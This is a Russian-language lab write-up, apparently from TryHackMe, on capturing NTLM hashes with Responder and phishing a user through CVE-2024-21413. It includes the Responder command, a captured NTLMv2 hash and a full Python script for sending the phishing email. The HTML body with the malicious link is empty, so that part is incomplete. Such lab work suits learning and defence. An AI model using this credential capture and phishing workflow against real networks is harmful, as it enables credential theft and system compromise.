
Демонстрирует захват NTLM-хэшей с помощью Responder и выполнение фишинговых писем, эксплуатирующих CVE-2024-21413 для компрометации систем.
Project Goal: Проект был создан для демонстрации использования различных инструментов для захвата NTLM-хешей пользователей в сети и выполнения фишинговых атак с помощью электронной почты. Это показывает, как уязвимости сетевой аутентификации и фишинговые методы могут быть использованы для компрометации систем.
Process Description
Я выполнил следующую команду для запуска Responder:
root@ip-10-10-192-145:~# sudo responder -I ens5
Я настроил Responder на прослушивание интерфейса ens5. Он сразу же начал перехватывать запросы аутентификации, что позволило мне просмотреть NTLM-хеши пользователей в сети, таких как THM-MONIKERLINK\tryhackme и WORKGROUP\Administrator. Вот как выглядел вывод при захвате хешей:
[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB
Эти хеши затем могут быть использованы для таких атак, как подбор пароля или атаки с использованием хешей.
Фишинговая ссылка в письме выглядела так:
Вот полный Python-скрипт, использованный для отправки фишингового письма:import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr
sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")
html_content = """\
"""message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email
msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)
server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()
try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)
try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()
Этот скрипт отправляет письмо с вредоносной ссылкой, которая потенциально может использовать уязвимость CVE-2024-21413.
Results В результате я смог продемонстрировать два ключевых аспекта:
Захват NTLM-хешей с помощью инструмента Responder, что является критическим шагом для атак на сетевую аутентификацию.
Фишинг и эксплуатация уязвимостей через электронную почту с помощью Python-скрипта. Отправка фишинговых писем с вредоносными ссылками может обмануть пользователей и привести к компрометации системы.
Этот проект показал, как сетевые уязвимости и фишинговые атаки могут быть использованы для получения доступа к системам. Он также подчеркнул важность защиты от таких атак с помощью надежных методов аутентификации и фильтрации почтового трафика.